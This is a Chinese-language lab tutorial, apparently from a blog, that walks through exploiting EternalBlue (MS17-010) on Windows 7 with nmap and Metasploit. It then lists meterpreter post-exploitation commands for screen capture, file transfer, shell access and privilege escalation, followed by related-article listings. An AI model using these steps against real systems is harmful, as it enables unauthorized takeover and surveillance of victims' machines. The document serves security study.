三、Kali Linux复现永恒之蓝漏洞
配置需求:
1、攻击机:Kali Linux (IP:192.168.1.100)
2、目标靶机:Winodws7
3、同一局域网
前言:
只知道目标靶机处于同一局域网的情况下,对目标靶机进行渗透攻击,仅供学习参考!
一、扫描目标靶机
第一步,首先找到有永恒之蓝漏洞的主机
输入命令nmap -sS -Pn 自身网段/24,如果知道目标IP地址只需nmap 目标IP
nmap -sS -Pn 网段/24
nmap 自身网段/24能够扫描自身网段下的所有主机,以及它们所开启的服务
可以看到IP地址为192.168.1.6的主机,开启了445端口(open),找到目标靶机后就可以进行第二个步骤
二、Metasploit渗透
输入命令msfconsole进入
msfconsole
再输入search ms17-010来查找模块
search ms17-010
下面为两个可以利用的模块,但我们只需要采用#=0的攻击模块
之后我们再来加载模块
use exploit/windows/smb/ms17_010_eternalblue
search查询过后,也可以用use 编号来选择模块的
再输入show options来查看配置
show options
Required为yes的都需要进行配置
set rhosts 192.168.1.6
最后输入run或者exploit进行攻击
进入后,可以输入help查看有哪有功能
例如screenshot将对方屏幕截图并保存下来
screenshot
再列举几个比较好用的
run vnc //获取对方屏幕(监控屏幕)
uoload //上传文件
download //下载文件
shell //命令符模式
getsystem //进行提权
getuid //查看权限
ps //查看进程
从入门到入狱
一、Kali Linux配置IP
二、Kali Linux实现ARP欺骗攻击
三、Kali Linux复现永恒之蓝漏洞相关推荐
- metasploit复现永恒之蓝漏洞
Table of Contents 0x01 设备 0x02 条件 0x03 漏洞复现 0x04 漏洞利用 00x0 后话 0x01 设备 内置metasploit的kali Linux: win7. ...
- 【常用工具】MSF使用教程(一)漏洞扫描与利用(以永恒之蓝漏洞复现为例)
目录 1 MSF框架 1.1 MSF简介 1.2 MSF五大模块类型 1.3 渗透攻击步骤 1.4 小结 2 实验简介 2.1 永恒之蓝简介 2.2 实验环境 2.3 实验目的 3 实验前准备 3.1 ...
- msf之ms17-010永恒之蓝漏洞
** 文章主旨: ** 1.熟悉msf的基本用法. 2.熟悉一些渗透中会用到基本的windows命令. 3.复现永恒之蓝漏洞. 漏洞原理: 通过向Windows服务器的SMBv1服务发送精心构造的命令 ...
- linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)
永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...
- 永恒之蓝漏洞复现(ms17-010)
文章目录 一.永恒之蓝(Eternal Blue) 二.复现环境 三.复现过程 1.主机发现 2.进入MSF框架 3.使用ms17-010扫描模块,对靶机进行扫描 3.1使用模块 3.2查看模块需要配 ...
- 043 扫描技术,OpenVAS,AWVS,永恒之蓝漏洞复现
文章目录 扫描技术 扫描神器 资产发现 主机发现: 端口扫描: 网络漏洞扫描 OpenVAS的使用 AWVS的安装与使用 永恒之蓝漏洞复现 扫描技术 扫描 自动化提高效率 扫描神器 nmap,跨平台使 ...
- MS17-010(永恒之蓝)漏洞复现和分析
MS17-010(永恒之蓝)漏洞复现和分析 一.漏洞简介 1.永恒之蓝介绍: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含&q ...
- 永恒之蓝漏洞复现测试
永恒之蓝MS17-010漏洞复现及利用 一.什么是永恒之蓝? 永恒之蓝漏洞是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. SMB(全称是Server Me ...
- ms17-010永恒之蓝漏洞复现
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.测试环境准备 1.安装VMware 2.安装攻击机(kali镜像) 1.安装靶机(win7) 二.测试前准备工作 ...
最新文章
- Python构建lassocv模型并输出Rad-score公式
- 如何锁定计算机硬盘,Win7系统怎么锁住磁盘|Win7系统锁住磁盘的详细步骤
- Ampzz 2011 Cross Spider 计算几何
- 永洪科技携手华为构建金融智慧运营与商业智能方案,解决金融敏捷分析难题
- linux 修改时间的命令,Linux 常用命令(查看版本、修改系统时间)
- VTK:直线网格之RectilinearGridToTetr​​ahedra
- html触发js参数怎么用,js 绑定带参数的事件以及手动触发事件
- JAVA拳皇_拳皇(Java简单的小程序)代码实例|chu
- centos上安装adobe flash
- linux内核的队列实现移植
- 1929. 数组串联
- Linux如何使用GPG(GNU Privacy Guard)对信息/文件进行加密和解密
- 洛谷 P4344 [SHOI2015]脑洞治疗仪
- caffe测试单张图片
- 【数据库】SQL建表
- 云计算IaaS核心技术全景指南
- 5类6类7类网线对比_超6类7类8类网线进来挨打 6类线全面测评 网速和传输速率测试...
- 2021招生之友+录取统计_电子版免费分享
- 梦幻手游最新服务器,梦幻西游手游最新要合并哪些服务器 最新合区汇总
- echart改变折线图和折线点的颜色以及折线点的大小
热门文章
- matlab如何修复照片裂纹,把撕裂破旧老照片修复还原的PS技巧
- Linux arm 内核选项和busybox选项 加载tun模块 -- 创建/dev/tun 字符设备
- BOSSGOO平台免费使用
- 高中计算机教案excel,[转载]高中信息技术教案(第三章Excel)
- 数学建模、运筹学之非线性规划
- js元素距离和鼠标位置整理
- 不知道干些什么,那就看看书吧!
- win10深澜校园网客户端拨号错误失败的解决办法
- .o/.obj 文件的组成格式
- 安卓应用SHA1的获取并在Unity中打包发布